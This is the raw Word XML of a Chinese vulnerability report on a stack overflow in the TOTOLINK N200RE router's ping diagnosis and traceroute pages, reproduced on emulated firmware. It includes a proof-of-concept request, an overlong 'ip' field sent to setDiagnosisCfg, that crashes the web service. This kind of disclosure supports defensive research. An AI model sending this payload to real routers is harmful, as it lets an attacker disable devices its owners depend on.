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A48DB1" w14:textId="70532657" w:rsidR="00F97CF5" w:rsidRDefault="005C5276" w:rsidP="00D65EDB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5276">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>TOTOLINK路由器N200RE存在栈溢出点注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2AA8CC" w14:textId="7D7EAB64" w:rsidR="00CD54AE" w:rsidRDefault="007A6913" w:rsidP="007A6913">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>资产证明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4830AE00" w14:textId="6D44404F" w:rsidR="00CD54AE" w:rsidRDefault="007A6913">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>截图如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B06E459" w14:textId="247C334C" w:rsidR="009249C2" w:rsidRDefault="009249C2"/>
    <w:p w14:paraId="6E34F197" w14:textId="0317B2A2" w:rsidR="003704D2" w:rsidRDefault="00922A0E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F2C951E" wp14:editId="0BDEF9BD">
            <wp:extent cx="5318171" cy="3695700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="947153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53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0786" cy="369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B89A" w14:textId="462E1381" w:rsidR="003704D2" w:rsidRDefault="003704D2"/>
    <w:p w14:paraId="3200A286" w14:textId="1C3E1288" w:rsidR="003704D2" w:rsidRDefault="00593B99" w:rsidP="00593B99">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>固件获取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0CFCF6" w14:textId="77777777" w:rsidR="00C85EDA" w:rsidRPr="00C85EDA" w:rsidRDefault="00C85EDA" w:rsidP="00C85EDA"/>
    <w:p w14:paraId="0FA6A4B7" w14:textId="3D300989" w:rsidR="003704D2" w:rsidRDefault="00E903F0">
      <w:r w:rsidRPr="00E903F0">
        <w:t>https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/204/ids/36.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6731D9" w14:textId="77777777" w:rsidR="0018404C" w:rsidRDefault="0018404C"/>
    <w:p w14:paraId="1D854513" w14:textId="61B994B1" w:rsidR="0018404C" w:rsidRDefault="00E903F0">
      <w:r>
        <w:t>V9.3.5u.6095_B20200916</w:t>
      </w:r>
      <w:r w:rsidR="00954CCD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本的固件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08747939" w14:textId="77777777" w:rsidR="00954CCD" w:rsidRPr="0018404C" w:rsidRDefault="00954CCD"/>
    <w:p w14:paraId="1DA51483" w14:textId="0C93954D" w:rsidR="003704D2" w:rsidRDefault="00C55FF6" w:rsidP="009545C3">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞证明</w:t>
      </w:r>
      <w:r w:rsidR="00AA3614">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCAE29A" w14:textId="292F62AD" w:rsidR="0027649E" w:rsidRDefault="0027649E"/>
    <w:p w14:paraId="6FC31E4B" w14:textId="77777777" w:rsidR="0027649E" w:rsidRDefault="0027649E"/>
    <w:p w14:paraId="4D2CAEEE" w14:textId="77777777" w:rsidR="009249C2" w:rsidRDefault="009249C2"/>
    <w:p w14:paraId="1332A125" w14:textId="492B657D" w:rsidR="00D46645" w:rsidRDefault="00FA24D8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>截图如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798670A2" w14:textId="37B62D8A" w:rsidR="00083C06" w:rsidRDefault="00083C06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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用WSL以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00083C06">
        <w:t>QEMU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MIPSel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将环境配置好，导入固件系统进行仿真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，并使用</w:t>
      </w:r>
      <w:r w:rsidR="00D85098" w:rsidRPr="00D85098">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>chroot ./squashfs-root/ sh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进入固件系统，开启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www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下的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web</w:t>
      </w:r>
      <w:r w:rsidR="00D85098">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>服务：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7807D7A3" w14:textId="6054CA77" w:rsidR="00E55405" w:rsidRDefault="00D44E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44E98">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>lighttpd -f lighttp/lighttpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9045F4" w14:textId="7CD0B5C3" w:rsidR="00D85098" w:rsidRDefault="00E55405">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans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6DD9E8E2" wp14:editId="2AD9DD22">
            <wp:extent cx="5274310" cy="1710055"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="1919768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68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FFC5" w14:textId="7D30FAE9" w:rsidR="00083C06" w:rsidRDefault="00083C06"/>
    <w:p w14:paraId="74F5E9FB" w14:textId="77777777" w:rsidR="006938D5" w:rsidRDefault="006938D5"/>
    <w:p w14:paraId="38FCAC37" w14:textId="77777777" w:rsidR="006938D5" w:rsidRDefault="006938D5"/>
    <w:p w14:paraId="323F7E36" w14:textId="5692A2D4" w:rsidR="006938D5" w:rsidRDefault="006938D5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启的web服务证明如下</w:t>
      </w:r>
      <w:r w:rsidR="00D4650B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以看到下方是</w:t>
      </w:r>
      <w:r w:rsidR="00D4650B">
        <w:t>V9.3.5u.6095</w:t>
      </w:r>
      <w:r w:rsidR="002C0ABF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的版本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5895211A" w14:textId="77777777" w:rsidR="006938D5" w:rsidRDefault="006938D5"/>
    <w:p w14:paraId="31E40F3A" w14:textId="23141938" w:rsidR="006938D5" w:rsidRDefault="00D4650B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="551838E2" wp14:editId="38792483">
            <wp:extent cx="3671304" cy="2262188"/>
            <wp:effectExtent l="0" t="0" r="5715" b="5080"/>
            <wp:docPr id="17274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8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266" cy="22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F26B" w14:textId="77777777" w:rsidR="00737C37" w:rsidRDefault="00737C37"/>
    <w:p w14:paraId="4C636ED1" w14:textId="77777777" w:rsidR="00737C37" w:rsidRDefault="00737C37"/>
    <w:p w14:paraId="7AAA59A2" w14:textId="6627DA7E" w:rsidR="00B97774" w:rsidRDefault="005614C2" w:rsidP="00CA6B14">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005614C2">
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA6B14" w:rsidRPr="00CA6B14">
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>TOTOLINK</w:t>
      </w:r>
      <w:r w:rsidR="00CA6B14" w:rsidRPr="00CA6B14">
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>路由器</w:t>
      </w:r>
      <w:r w:rsidR="00CA6B14" w:rsidRPr="00CA6B14">
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>N200RE</w:t>
      </w:r>
      <w:r w:rsidR="00CA6B14" w:rsidRPr="00CA6B14">
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>存在栈溢出点注入漏洞</w:t>
      </w:r>
      <w:r w:rsidR="008765C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="008765C6" w:rsidRPr="005F7778">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://127.0.0.1/advance/changepwd.html?time=1715093812978</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="030A0BD3" w14:textId="59A505BC" w:rsidR="009709AC" w:rsidRPr="009709AC" w:rsidRDefault="008765C6">
      <w:r w:rsidRPr="003D2D03">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>进入后台页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E2968A" w14:textId="3ACF5BD2" w:rsidR="00005236" w:rsidRDefault="001E76BC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40026506" wp14:editId="2708A451">
            <wp:extent cx="2257425" cy="1014292"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1923655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559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8736" cy="101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4500" w14:textId="77777777" w:rsidR="0087425D" w:rsidRDefault="0087425D"/>
    <w:p w14:paraId="0EC66911" w14:textId="52CF9289" w:rsidR="0087425D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系统工具里</w:t>
      </w:r>
      <w:r w:rsidR="001468B0">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>有个</w:t>
      </w:r>
      <w:r w:rsidR="001468B0">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>诊断</w:t>
      </w:r>
      <w:r w:rsidR="0032509C">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>和路由追踪</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289E2B1C" w14:textId="42D4482E" w:rsidR="00E41452" w:rsidRDefault="00E41452" w:rsidP="0087425D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 w:rsidRPr="00E41452">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>http://127.0.0.1/advance/diagnosis.html?time=1715094815606</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9EC3A3" w14:textId="6AC85F86" w:rsidR="0032509C" w:rsidRDefault="00E41452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hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00BC1D79">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          </w:rPr>
          <w:t>http://127.0.0.1/advance/traceroute.html?time=1696861371925</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="17FB49C4" w14:textId="30639D24" w:rsidR="00451945" w:rsidRPr="00451945" w:rsidRDefault="00E41452" w:rsidP="00451945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Fonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>这两个都可以造成栈溢出点漏洞利用</w:t>
      </w:r>
      <w:r w:rsidR="00D650F2">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00451945" w:rsidRPr="00451945">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>用到上面的</w:t>
      </w:r>
      <w:r w:rsidR="00451945" w:rsidRPr="00451945">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r w:rsidR="00451945" w:rsidRPr="00451945">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:r w:rsidR="00D650F2">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>示范</w:t>
      </w:r>
      <w:r w:rsidR="00CB0C6C">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031E99F8" w14:textId="1E49944F" w:rsidR="00E41452" w:rsidRPr="00E41452" w:rsidRDefault="00451945" w:rsidP="00451945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 w:rsidRPr="00451945">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
      <w:r w:rsidRPr="00451945">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>无限写入到</w:t>
      </w:r>
      <w:r w:rsidRPr="00451945">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>v6</w:t>
      </w:r>
      <w:r w:rsidRPr="00451945">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>，但是</w:t>
      </w:r>
      <w:r w:rsidRPr="00451945">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>v6</w:t>
      </w:r>
      <w:r w:rsidRPr="00451945">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>是有限的数组，会造成栈溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0F388E" w14:textId="09294553" w:rsidR="00013001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F55409F" wp14:editId="768514AE">
            <wp:extent cx="5274310" cy="2298700"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="696964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64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5554" w14:textId="77777777" w:rsidR="00013001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5E3A5501" w14:textId="22DF9B45" w:rsidR="00013001" w:rsidRDefault="00013001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输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>127.0.0.1   1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>条数抓包</w:t>
      </w:r>
      <w:r w:rsidR="00836E38">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>，点击发包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF561E0" w14:textId="7704A286" w:rsidR="00836E38" w:rsidRDefault="00FC72C9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07DBD689" wp14:editId="10BFE821">
            <wp:extent cx="2238375" cy="990911"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1131456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56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5369" cy="99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B8D4" w14:textId="77777777" w:rsidR="00352D64" w:rsidRDefault="00352D6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20E5DE76" w14:textId="3DAB2A7B" w:rsidR="00352D64" w:rsidRDefault="00352D64" w:rsidP="0087425D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Fonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>ayload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>如下，构造大量垃圾数据</w:t>
      </w:r>
      <w:r w:rsidR="004060E4">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FC2589" w14:textId="77777777" w:rsidR="004B39FE" w:rsidRDefault="004B39FE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</w:p>
    <w:p w14:paraId="4EF7ADDC" w14:textId="105DED14" w:rsidR="004B39FE" w:rsidRDefault="00352D6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 w:rsidRPr="00352D64">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>{"ip":"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a</w:t>
      </w:r>
      <w:r w:rsidRPr="00352D64">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","num":"1","topicurl":"setDiagnosisCfg"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017F2F91" w14:textId="12B811F9" w:rsidR="001468B0" w:rsidRDefault="004060E4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点击发包：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302D837F" w14:textId="593FC1F9" w:rsidR="004060E4" w:rsidRDefault="00D31149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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E015AB3" wp14:editId="2AFEDDEA">
            <wp:extent cx="5274310" cy="2883535"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14438629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629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6C9A" w14:textId="24CC4EFF" w:rsidR="00D31149" w:rsidRDefault="00D31149" w:rsidP="0087425D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 w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>可以看到服务器成功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>500</w:t>
      </w:r>
      <w:r w:rsidR="006A1B60">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D59ACB4" w14:textId="3EC8E4A9" w:rsidR="00631792" w:rsidRPr="0087425D" w:rsidRDefault="00631792" w:rsidP="0087425D">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:spacing w:before="192" w:beforeAutospacing="0" w:after="192" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>诊断和路由追踪两个地方都存在该栈溢出漏洞。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00631792" w:rsidRPr="00874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A5816E" w14:textId="77777777" w:rsidR="00992DB0" w:rsidRDefault="00992DB0" w:rsidP="00E903F0">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="257F74A5" w14:textId="77777777" w:rsidR="00992DB0" w:rsidRDefault="00992DB0" w:rsidP="00E903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4FFDF7" w14:textId="77777777" w:rsidR="00992DB0" w:rsidRDefault="00992DB0" w:rsidP="00E903F0">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="07F9416D" w14:textId="77777777" w:rsidR="00992DB0" w:rsidRDefault="00992DB0" w:rsidP="00E903F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A29"/>
    <w:rsid w:val="00005236"/>
    <w:rsid w:val="00013001"/>
    <w:rsid w:val="000669DF"/>
    <w:rsid w:val="0007422A"/>
    <w:rsid w:val="000806A3"/>
    <w:rsid w:val="00082203"/>
    <w:rsid w:val="00083C06"/>
    <w:rsid w:val="000B545C"/>
    <w:rsid w:val="000C463E"/>
    <w:rsid w:val="000E05C7"/>
    <w:rsid w:val="000E13BD"/>
    <w:rsid w:val="0012091B"/>
    <w:rsid w:val="00122E56"/>
    <w:rsid w:val="001468B0"/>
    <w:rsid w:val="00156E23"/>
    <w:rsid w:val="00161B35"/>
    <w:rsid w:val="0018404C"/>
    <w:rsid w:val="001B638C"/>
    <w:rsid w:val="001C5F30"/>
    <w:rsid w:val="001E76BC"/>
    <w:rsid w:val="00205C1B"/>
    <w:rsid w:val="00217A78"/>
    <w:rsid w:val="002334BA"/>
    <w:rsid w:val="002635ED"/>
    <w:rsid w:val="0027649E"/>
    <w:rsid w:val="0028424F"/>
    <w:rsid w:val="002C0ABF"/>
    <w:rsid w:val="002C6C31"/>
    <w:rsid w:val="002D1472"/>
    <w:rsid w:val="00306AB7"/>
    <w:rsid w:val="00320F2A"/>
    <w:rsid w:val="0032509C"/>
    <w:rsid w:val="00351A1A"/>
    <w:rsid w:val="00352D64"/>
    <w:rsid w:val="003556F6"/>
    <w:rsid w:val="003704D2"/>
    <w:rsid w:val="003D2D03"/>
    <w:rsid w:val="003D3FB4"/>
    <w:rsid w:val="003D64A7"/>
    <w:rsid w:val="004060E4"/>
    <w:rsid w:val="00421B3F"/>
    <w:rsid w:val="00451945"/>
    <w:rsid w:val="004631E5"/>
    <w:rsid w:val="00466345"/>
    <w:rsid w:val="00476BF0"/>
    <w:rsid w:val="004B39FE"/>
    <w:rsid w:val="004E419A"/>
    <w:rsid w:val="00540FAA"/>
    <w:rsid w:val="005614C2"/>
    <w:rsid w:val="005778C4"/>
    <w:rsid w:val="00577B59"/>
    <w:rsid w:val="00593B99"/>
    <w:rsid w:val="005A0363"/>
    <w:rsid w:val="005C5276"/>
    <w:rsid w:val="00631792"/>
    <w:rsid w:val="00644001"/>
    <w:rsid w:val="00655095"/>
    <w:rsid w:val="00661099"/>
    <w:rsid w:val="006938D5"/>
    <w:rsid w:val="006A1B60"/>
    <w:rsid w:val="006C572A"/>
    <w:rsid w:val="006D6D81"/>
    <w:rsid w:val="006F029F"/>
    <w:rsid w:val="0071416F"/>
    <w:rsid w:val="00737C37"/>
    <w:rsid w:val="00755A0E"/>
    <w:rsid w:val="00791993"/>
    <w:rsid w:val="007A6913"/>
    <w:rsid w:val="007F05CC"/>
    <w:rsid w:val="00816743"/>
    <w:rsid w:val="00836E38"/>
    <w:rsid w:val="0085515B"/>
    <w:rsid w:val="008613D2"/>
    <w:rsid w:val="0087425D"/>
    <w:rsid w:val="008765C6"/>
    <w:rsid w:val="008809CB"/>
    <w:rsid w:val="00882C64"/>
    <w:rsid w:val="008B5204"/>
    <w:rsid w:val="008E45AC"/>
    <w:rsid w:val="00922A0E"/>
    <w:rsid w:val="009249C2"/>
    <w:rsid w:val="009545C3"/>
    <w:rsid w:val="00954CCD"/>
    <w:rsid w:val="00956315"/>
    <w:rsid w:val="009709AC"/>
    <w:rsid w:val="00992DB0"/>
    <w:rsid w:val="009A5466"/>
